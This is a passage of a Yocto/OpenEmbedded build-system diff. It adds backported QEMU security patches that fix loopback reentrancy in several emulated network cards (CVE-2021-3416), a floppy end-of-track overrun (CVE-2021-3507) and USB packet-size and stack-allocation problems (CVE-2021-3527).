+for a NIC with this check.
+
+NIC that supports loopback mode will be converted to this helper.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Cc: qemu-stable@nongnu.org
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [705df5466c98f3efdd2b68d3b31dad86858acad7]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ include/net/net.h | 5 +++++
+ include/net/queue.h | 8 ++++++++
+ net/net.c | 38 +++++++++++++++++++++++++++++++-------
+ net/queue.c | 22 ++++++++++++++++++++++
+ 4 files changed, 66 insertions(+), 7 deletions(-)
+
+diff --git a/include/net/net.h b/include/net/net.h
+index 778fc787c..03f058ecb 100644
+--- a/include/net/net.h
++++ b/include/net/net.h
+@@ -143,12 +143,17 @@ void *qemu_get_nic_opaque(NetClientState *nc);
+ void qemu_del_net_client(NetClientState *nc);
+ typedef void (*qemu_nic_foreach)(NICState *nic, void *opaque);
+ void qemu_foreach_nic(qemu_nic_foreach func, void *opaque);
++int qemu_can_receive_packet(NetClientState *nc);
+ int qemu_can_send_packet(NetClientState *nc);
+ ssize_t qemu_sendv_packet(NetClientState *nc, const struct iovec *iov,
+ int iovcnt);
+ ssize_t qemu_sendv_packet_async(NetClientState *nc, const struct iovec *iov,
+ int iovcnt, NetPacketSent *sent_cb);
+ ssize_t qemu_send_packet(NetClientState *nc, const uint8_t *buf, int size);
++ssize_t qemu_receive_packet(NetClientState *nc, const uint8_t *buf, int size);
++ssize_t qemu_receive_packet_iov(NetClientState *nc,
++ const struct iovec *iov,
++ int iovcnt);
+ ssize_t qemu_send_packet_raw(NetClientState *nc, const uint8_t *buf, int size);
+ ssize_t qemu_send_packet_async(NetClientState *nc, const uint8_t *buf,
+ int size, NetPacketSent *sent_cb);
+diff --git a/include/net/queue.h b/include/net/queue.h
+index c0269bb1d..9f2f289d7 100644
+--- a/include/net/queue.h
++++ b/include/net/queue.h
+@@ -55,6 +55,14 @@ void qemu_net_queue_append_iov(NetQueue *queue,
+
+ void qemu_del_net_queue(NetQueue *queue);
+
++ssize_t qemu_net_queue_receive(NetQueue *queue,
++ const uint8_t *data,
++ size_t size);
++
++ssize_t qemu_net_queue_receive_iov(NetQueue *queue,
++ const struct iovec *iov,
++ int iovcnt);
++
+ ssize_t qemu_net_queue_send(NetQueue *queue,
+ NetClientState *sender,
+ unsigned flags,
+diff --git a/net/net.c b/net/net.c
+index 6a2c3d956..5e15e5d27 100644
+--- a/net/net.c
++++ b/net/net.c
+@@ -528,6 +528,17 @@ int qemu_set_vnet_be(NetClientState *nc, bool is_be)
+ #endif
+ }
+
++int qemu_can_receive_packet(NetClientState *nc)
++{
++ if (nc->receive_disabled) {
++ return 0;
++ } else if (nc->info->can_receive &&
++ !nc->info->can_receive(nc)) {
++ return 0;
++ }
++ return 1;
++}
++
+ int qemu_can_send_packet(NetClientState *sender)
+ {
+ int vm_running = runstate_is_running();
+@@ -540,13 +551,7 @@ int qemu_can_send_packet(NetClientState *sender)
+ return 1;
+ }
+
+- if (sender->peer->receive_disabled) {
+- return 0;
+- } else if (sender->peer->info->can_receive &&
+- !sender->peer->info->can_receive(sender->peer)) {
+- return 0;
+- }
+- return 1;
++ return qemu_can_receive_packet(sender->peer);
+ }
+
+ static ssize_t filter_receive_iov(NetClientState *nc,
+@@ -679,6 +684,25 @@ ssize_t qemu_send_packet(NetClientState *nc, const uint8_t *buf, int size)
+ return qemu_send_packet_async(nc, buf, size, NULL);
+ }
+
++ssize_t qemu_receive_packet(NetClientState *nc, const uint8_t *buf, int size)
++{
++ if (!qemu_can_receive_packet(nc)) {
++ return 0;
++ }
++
++ return qemu_net_queue_receive(nc->incoming_queue, buf, size);
++}
++
++ssize_t qemu_receive_packet_iov(NetClientState *nc, const struct iovec *iov,
++ int iovcnt)
++{
++ if (!qemu_can_receive_packet(nc)) {
++ return 0;
++ }
++
++ return qemu_net_queue_receive_iov(nc->incoming_queue, iov, iovcnt);
++}
++
+ ssize_t qemu_send_packet_raw(NetClientState *nc, const uint8_t *buf, int size)
+ {
+ return qemu_send_packet_async_with_flags(nc, QEMU_NET_PACKET_FLAG_RAW,
+diff --git a/net/queue.c b/net/queue.c
+index 19e32c80f..c872d51df 100644
+--- a/net/queue.c
++++ b/net/queue.c
+@@ -182,6 +182,28 @@ static ssize_t qemu_net_queue_deliver_iov(NetQueue *queue,
+ return ret;
+ }
+
++ssize_t qemu_net_queue_receive(NetQueue *queue,
++ const uint8_t *data,
++ size_t size)
++{
++ if (queue->delivering) {
++ return 0;
++ }
++
++ return qemu_net_queue_deliver(queue, NULL, 0, data, size);
++}
++
++ssize_t qemu_net_queue_receive_iov(NetQueue *queue,
++ const struct iovec *iov,
++ int iovcnt)
++{
++ if (queue->delivering) {
++ return 0;
++ }
++
++ return qemu_net_queue_deliver_iov(queue, NULL, 0, iov, iovcnt);
++}
++
+ ssize_t qemu_net_queue_send(NetQueue *queue,
+ NetClientState *sender,
+ unsigned flags,
+--
+2.29.2
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_10.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_10.patch
new file mode 100644
index 0000000000..fdb4894e44
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_10.patch
@@ -0,0 +1,41 @@
+From 65b851efd3d0280425c202f4e5880c48f8334dae Mon Sep 17 00:00:00 2001
+From: Alexander Bulekov <alxndr@bu.edu>
+Date: Mon, 1 Mar 2021 14:35:30 -0500
+Subject: [PATCH 10/10] lan9118: switch to use qemu_receive_packet() for
+ loopback
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_packet() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com
+Signed-off-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [37cee01784ff0df13e5209517e1b3594a5e792d1]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/lan9118.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: qemu-4.2.0/hw/net/lan9118.c
+===================================================================
+--- qemu-4.2.0.orig/hw/net/lan9118.c
++++ qemu-4.2.0/hw/net/lan9118.c
+@@ -667,7 +667,7 @@ static void do_tx_packet(lan9118_state *
+ /* FIXME: Honor TX disable, and allow queueing of packets. */
+ if (s->phy_control & 0x4000) {
+ /* This assumes the receive routine doesn't touch the VLANClient. */
+- lan9118_receive(qemu_get_queue(s->nic), s->txp->data, s->txp->len);
++ qemu_receive_packet(qemu_get_queue(s->nic), s->txp->data, s->txp->len);
+ } else {
+ qemu_send_packet(qemu_get_queue(s->nic), s->txp->data, s->txp->len);
+ }
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_2.patch
new file mode 100644
index 0000000000..5e53e20bac
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_2.patch
@@ -0,0 +1,42 @@
+From e2a48a3c7cc33dbbe89f896e0f07462cb04ff6b5 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Wed, 24 Feb 2021 12:13:22 +0800
+Subject: [PATCH 02/10] e1000: switch to use qemu_receive_packet() for loopback
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_packet() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [1caff0340f49c93d535c6558a5138d20d475315c]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/e1000.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/hw/net/e1000.c b/hw/net/e1000.c
+index d7d05ae30..cf22c4f07 100644
+--- a/hw/net/e1000.c
++++ b/hw/net/e1000.c
+@@ -546,7 +546,7 @@ e1000_send_packet(E1000State *s, const uint8_t *buf, int size)
+
+ NetClientState *nc = qemu_get_queue(s->nic);
+ if (s->phy_reg[PHY_CTRL] & MII_CR_LOOPBACK) {
+- nc->info->receive(nc, buf, size);
++ qemu_receive_packet(nc, buf, size);
+ } else {
+ qemu_send_packet(nc, buf, size);
+ }
+--
+2.29.2
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_3.patch
new file mode 100644
index 0000000000..3fc469e3e3
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_3.patch
@@ -0,0 +1,43 @@
+From c041a4da1ff119715e0ccf2d4a7af62568f17b93 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Wed, 24 Feb 2021 12:57:40 +0800
+Subject: [PATCH 03/10] dp8393x: switch to use qemu_receive_packet() for
+ loopback packet
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_packet() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [331d2ac9ea307c990dc86e6493e8f0c48d14bb33]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/dp8393x.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/hw/net/dp8393x.c b/hw/net/dp8393x.c
+index 205c0decc..533a8304d 100644
+--- a/hw/net/dp8393x.c
++++ b/hw/net/dp8393x.c
+@@ -506,7 +506,7 @@ static void dp8393x_do_transmit_packets(dp8393xState *s)
+ s->regs[SONIC_TCR] |= SONIC_TCR_CRSL;
+ if (nc->info->can_receive(nc)) {
+ s->loopback_packet = 1;
+- nc->info->receive(nc, s->tx_buffer, tx_len);
++ qemu_receive_packet(nc, s->tx_buffer, tx_len);
+ }
+ } else {
+ /* Transmit packet */
+--
+2.29.2
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_5.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_5.patch
new file mode 100644
index 0000000000..93202ebcef
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_5.patch
@@ -0,0 +1,42 @@
+From d465dc79c9ee729d91ef086b993e956b1935be69 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Wed, 24 Feb 2021 13:14:35 +0800
+Subject: [PATCH 05/10] sungem: switch to use qemu_receive_packet() for
+ loopback
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_packet() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Reviewed-by: Alistair Francis <alistair.francis@wdc.com>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [8c92060d3c0248bd4d515719a35922cd2391b9b4]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/sungem.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: qemu-4.2.0/hw/net/sungem.c
+===================================================================
+--- qemu-4.2.0.orig/hw/net/sungem.c
++++ qemu-4.2.0/hw/net/sungem.c
+@@ -305,7 +305,7 @@ static void sungem_send_packet(SunGEMSta
+ NetClientState *nc = qemu_get_queue(s->nic);
+
+ if (s->macregs[MAC_XIFCFG >> 2] & MAC_XIFCFG_LBCK) {
+- nc->info->receive(nc, buf, size);
++ qemu_receive_packet(nc, buf, size);
+ } else {
+ qemu_send_packet(nc, buf, size);
+ }
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_6.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_6.patch
new file mode 100644
index 0000000000..40b4bd96e7
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_6.patch
@@ -0,0 +1,40 @@
+From c0010f9b2bafe866fe32e3c2688454bc24147136 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Wed, 24 Feb 2021 13:27:52 +0800
+Subject: [PATCH 06/10] tx_pkt: switch to use qemu_receive_packet_iov() for
+ loopback
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_receive_iov() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [8c552542b81e56ff532dd27ec6e5328954bdda73]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/net_tx_pkt.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: qemu-4.2.0/hw/net/net_tx_pkt.c
+===================================================================
+--- qemu-4.2.0.orig/hw/net/net_tx_pkt.c
++++ qemu-4.2.0/hw/net/net_tx_pkt.c
+@@ -544,7 +544,7 @@ static inline void net_tx_pkt_sendv(stru
+ NetClientState *nc, const struct iovec *iov, int iov_cnt)
+ {
+ if (pkt->is_loopback) {
+- nc->info->receive_iov(nc, iov, iov_cnt);
++ qemu_receive_packet_iov(nc, iov, iov_cnt);
+ } else {
+ qemu_sendv_packet(nc, iov, iov_cnt);
+ }
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_7.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_7.patch
new file mode 100644
index 0000000000..b3b702cca4
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_7.patch
@@ -0,0 +1,42 @@
+From 64b38675c728354e4015e4bec3d975cd4cb8a981 Mon Sep 17 00:00:00 2001
+From: Alexander Bulekov <alxndr@bu.edu>
+Date: Fri, 26 Feb 2021 13:47:53 -0500
+Subject: [PATCH 07/10] rtl8139: switch to use qemu_receive_packet() for
+ loopback
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_packet() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Buglink: https://bugs.launchpad.net/qemu/+bug/1910826
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com
+Signed-off-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [5311fb805a4403bba024e83886fa0e7572265de4]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/rtl8139.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: qemu-4.2.0/hw/net/rtl8139.c
+===================================================================
+--- qemu-4.2.0.orig/hw/net/rtl8139.c
++++ qemu-4.2.0/hw/net/rtl8139.c
+@@ -1793,7 +1793,7 @@ static void rtl8139_transfer_frame(RTL81
+ }
+
+ DPRINTF("+++ transmit loopback mode\n");
+- rtl8139_do_receive(qemu_get_queue(s->nic), buf, size, do_interrupt);
++ qemu_receive_packet(qemu_get_queue(s->nic), buf, size);
+
+ if (iov) {
+ g_free(buf2);
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_8.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_8.patch
new file mode 100644
index 0000000000..ed716468dc
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_8.patch
@@ -0,0 +1,44 @@
+From 023ce62f0a788ad3a8233c7a828554bceeafd031 Mon Sep 17 00:00:00 2001
+From: Alexander Bulekov <alxndr@bu.edu>
+Date: Mon, 1 Mar 2021 10:33:34 -0500
+Subject: [PATCH 08/10] pcnet: switch to use qemu_receive_packet() for loopback
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_packet() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Buglink: https://bugs.launchpad.net/qemu/+bug/1917085
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com
+Signed-off-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [99ccfaa1edafd79f7a3a0ff7b58ae4da7c514928]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/pcnet.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/hw/net/pcnet.c b/hw/net/pcnet.c
+index f3f18d859..dcd3fc494 100644
+--- a/hw/net/pcnet.c
++++ b/hw/net/pcnet.c
+@@ -1250,7 +1250,7 @@ txagain:
+ if (BCR_SWSTYLE(s) == 1)
+ add_crc = !GET_FIELD(tmd.status, TMDS, NOFCS);
+ s->looptest = add_crc ? PCNET_LOOPTEST_CRC : PCNET_LOOPTEST_NOCRC;
+- pcnet_receive(qemu_get_queue(s->nic), s->buffer, s->xmit_pos);
++ qemu_receive_packet(qemu_get_queue(s->nic), s->buffer, s->xmit_pos);
+ s->looptest = 0;
+ } else {
+ if (s->nic) {
+--
+2.29.2
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_9.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_9.patch
new file mode 100644
index 0000000000..f4a985604e
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_9.patch
@@ -0,0 +1,41 @@
+From ecf7e62bb2cb02c9bd40082504ae376f3e19ffd2 Mon Sep 17 00:00:00 2001
+From: Alexander Bulekov <alxndr@bu.edu>
+Date: Mon, 1 Mar 2021 14:33:43 -0500
+Subject: [PATCH 09/10] cadence_gem: switch to use qemu_receive_packet() for
+ loopback
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_packet() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Signed-off-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [e73adfbeec9d4e008630c814759052ed945c3fed]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/cadence_gem.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+Index: qemu-4.2.0/hw/net/cadence_gem.c
+===================================================================
+--- qemu-4.2.0.orig/hw/net/cadence_gem.c
++++ qemu-4.2.0/hw/net/cadence_gem.c
+@@ -1225,7 +1225,7 @@ static void gem_transmit(CadenceGEMState
+ /* Send the packet somewhere */
+ if (s->phy_loop || (s->regs[GEM_NWCTRL] &
+ GEM_NWCTRL_LOCALLOOP)) {
+- gem_receive(qemu_get_queue(s->nic), tx_packet,
++ qemu_receive_packet(qemu_get_queue(s->nic), tx_packet,
+ total_bytes);
+ } else {
+ qemu_send_packet(qemu_get_queue(s->nic), tx_packet,
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3507.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3507.patch
new file mode 100644
index 0000000000..4ff3413f8e
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3507.patch
@@ -0,0 +1,87 @@
+From defac5e2fbddf8423a354ff0454283a2115e1367 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <philmd@redhat.com>
+Date: Thu, 18 Nov 2021 12:57:32 +0100
+Subject: [PATCH] hw/block/fdc: Prevent end-of-track overrun (CVE-2021-3507)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Per the 82078 datasheet, if the end-of-track (EOT byte in
+the FIFO) is more than the number of sectors per side, the
+command is terminated unsuccessfully:
+
+* 5.2.5 DATA TRANSFER TERMINATION
+
+ The 82078 supports terminal count explicitly through
+ the TC pin and implicitly through the underrun/over-
+ run and end-of-track (EOT) functions. For full sector
+ transfers, the EOT parameter can define the last
+ sector to be transferred in a single or multisector
+ transfer. If the last sector to be transferred is a par-
+ tial sector, the host can stop transferring the data in
+ mid-sector, and the 82078 will continue to complete
+ the sector as if a hardware TC was received. The
+ only difference between these implicit functions and
+ TC is that they return "abnormal termination" result
+ status. Such status indications can be ignored if they
+ were expected.
+
+* 6.1.3 READ TRACK
+
+ This command terminates when the EOT specified
+ number of sectors have been read. If the 82078
+ does not find an I D Address Mark on the diskette
+ after the second· occurrence of a pulse on the
+ INDX# pin, then it sets the IC code in Status Regis-
+ ter 0 to "01" (Abnormal termination), sets the MA bit
+ in Status Register 1 to "1", and terminates the com-
+ mand.
+
+* 6.1.6 VERIFY
+
+ Refer to Table 6-6 and Table 6-7 for information
+ concerning the values of MT and EC versus SC and
+ EOT value.
+
+* Table 6·6. Result Phase Table
+
+* Table 6-7. Verify Command Result Phase Table
+
+Fix by aborting the transfer when EOT > # Sectors Per Side.
+
+Cc: qemu-stable@nongnu.org
+Cc: Hervé Poussineau <hpoussin@reactos.org>
+Fixes: baca51faff0 ("floppy driver: disk geometry auto detect")
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Resolves: https://gitlab.com/qemu-project/qemu/-/issues/339
+Signed-off-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Message-Id: <20211118115733.4038610-2-philmd@redhat.com>
+Reviewed-by: Hanna Reitz <hreitz@redhat.com>
+Signed-off-by: Kevin Wolf <kwolf@redhat.com>
+
+Upstream-Status: Backport [https://github.com/qemu/qemu/commit/defac5e2fbddf8423a354ff0454283a2115e1367]
+CVE: CVE-2021-3507
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ hw/block/fdc.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/hw/block/fdc.c b/hw/block/fdc.c
+index 347875a0cdae..57bb355794a9 100644
+--- a/hw/block/fdc.c
++++ b/hw/block/fdc.c
+@@ -1530,6 +1530,14 @@ static void fdctrl_start_transfer(FDCtrl *fdctrl, int direction)
+ int tmp;
+ fdctrl->data_len = 128 << (fdctrl->fifo[5] > 7 ? 7 : fdctrl->fifo[5]);
+ tmp = (fdctrl->fifo[6] - ks + 1);
++ if (tmp < 0) {
++ FLOPPY_DPRINTF("invalid EOT: %d\n", tmp);
++ fdctrl_stop_transfer(fdctrl, FD_SR0_ABNTERM, FD_SR1_MA, 0x00);
++ fdctrl->fifo[3] = kt;
++ fdctrl->fifo[4] = kh;
++ fdctrl->fifo[5] = ks;
++ return;
++ }
+ if (fdctrl->fifo[0] & 0x80)
+ tmp += fdctrl->fifo[6];
+ fdctrl->data_len *= tmp;
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-1.patch
new file mode 100644
index 0000000000..77a5385692
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-1.patch
@@ -0,0 +1,42 @@
+From 05a40b172e4d691371534828078be47e7fff524c Mon Sep 17 00:00:00 2001
+From: Gerd Hoffmann <kraxel@redhat.com>
+Date: Mon, 3 May 2021 15:29:15 +0200
+Subject: [PATCH] usb: limit combined packets to 1 MiB (CVE-2021-3527)
+
+usb-host and usb-redirect try to batch bulk transfers by combining many
+small usb packets into a single, large transfer request, to reduce the
+overhead and improve performance.
+
+This patch adds a size limit of 1 MiB for those combined packets to
+restrict the host resources the guest can bind that way.
+
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+Message-Id: <20210503132915.2335822-6-kraxel@redhat.com>
+
+Upstream-Status: Backport
+https://gitlab.com/qemu-project/qemu/-/commit/05a40b172e4d691371534828078be47e7fff524c
+CVE: CVE-2021-3527
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ hw/usb/combined-packet.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/hw/usb/combined-packet.c b/hw/usb/combined-packet.c
+index 5d57e883dc..e56802f89a 100644
+--- a/hw/usb/combined-packet.c
++++ b/hw/usb/combined-packet.c
+@@ -171,7 +171,9 @@ void usb_ep_combine_input_packets(USBEndpoint *ep)
+ if ((p->iov.size % ep->max_packet_size) != 0 || !p->short_not_ok ||
+ next == NULL ||
+ /* Work around for Linux usbfs bulk splitting + migration */
+- (totalsize == (16 * KiB - 36) && p->int_req)) {
++ (totalsize == (16 * KiB - 36) && p->int_req) ||
++ /* Next package may grow combined package over 1MiB */
++ totalsize > 1 * MiB - ep->max_packet_size) {
+ usb_device_handle_data(ep->dev, first);
+ assert(first->status == USB_RET_ASYNC);
+ if (first->combined) {
+--
+GitLab
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-2.patch
new file mode 100644
index 0000000000..6371aced12
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-2.patch
@@ -0,0 +1,59 @@
+From 7ec54f9eb62b5d177e30eb8b1cad795a5f8d8986 Mon Sep 17 00:00:00 2001
+From: Gerd Hoffmann <kraxel@redhat.com>
+Date: Mon, 3 May 2021 15:29:12 +0200
+Subject: [PATCH] usb/redir: avoid dynamic stack allocation (CVE-2021-3527)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Use autofree heap allocation instead.
+
+Fixes: 4f4321c11ff ("usb: use iovecs in USBPacket")
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+Tested-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Message-Id: <20210503132915.2335822-3-kraxel@redhat.com>
+
+Upstream-Status: Backport
+https://gitlab.com/qemu-project/qemu/-/commit/7ec54f9eb62b5d177e30eb8b1cad795a5f8d8986
+CVE: CVE-2021-3527
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ hw/usb/redirect.c | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/hw/usb/redirect.c b/hw/usb/redirect.c
+index 17f06f3417..6a75b0dc4a 100644
+--- a/hw/usb/redirect.c
++++ b/hw/usb/redirect.c
+@@ -620,7 +620,7 @@ static void usbredir_handle_iso_data(USBRedirDevice *dev, USBPacket *p,
+ .endpoint = ep,
+ .length = p->iov.size
+ };
+- uint8_t buf[p->iov.size];
++ g_autofree uint8_t *buf = g_malloc(p->iov.size);
+ /* No id, we look at the ep when receiving a status back */
+ usb_packet_copy(p, buf, p->iov.size);
+ usbredirparser_send_iso_packet(dev->parser, 0, &iso_packet,
+@@ -818,7 +818,7 @@ static void usbredir_handle_bulk_data(USBRedirDevice *dev, USBPacket *p,
+ usbredirparser_send_bulk_packet(dev->parser, p->id,
+ &bulk_packet, NULL, 0);
+ } else {
+- uint8_t buf[size];
++ g_autofree uint8_t *buf = g_malloc(size);
+ usb_packet_copy(p, buf, size);
+ usbredir_log_data(dev, "bulk data out:", buf, size);
+ usbredirparser_send_bulk_packet(dev->parser, p->id,
+@@ -923,7 +923,7 @@ static void usbredir_handle_interrupt_out_data(USBRedirDevice *dev,
+ USBPacket *p, uint8_t ep)
+ {
+ struct usb_redir_interrupt_packet_header interrupt_packet;
+- uint8_t buf[p->iov.size];
++ g_autofree uint8_t *buf = g_malloc(p->iov.size);
+
+ DPRINTF("interrupt-out ep %02X len %zd id %"PRIu64"\n", ep,
+ p->iov.size, p->id);
+--
+GitLab
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3544.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544.patch
new file mode 100644
index 0000000000..1b4fcbfb60
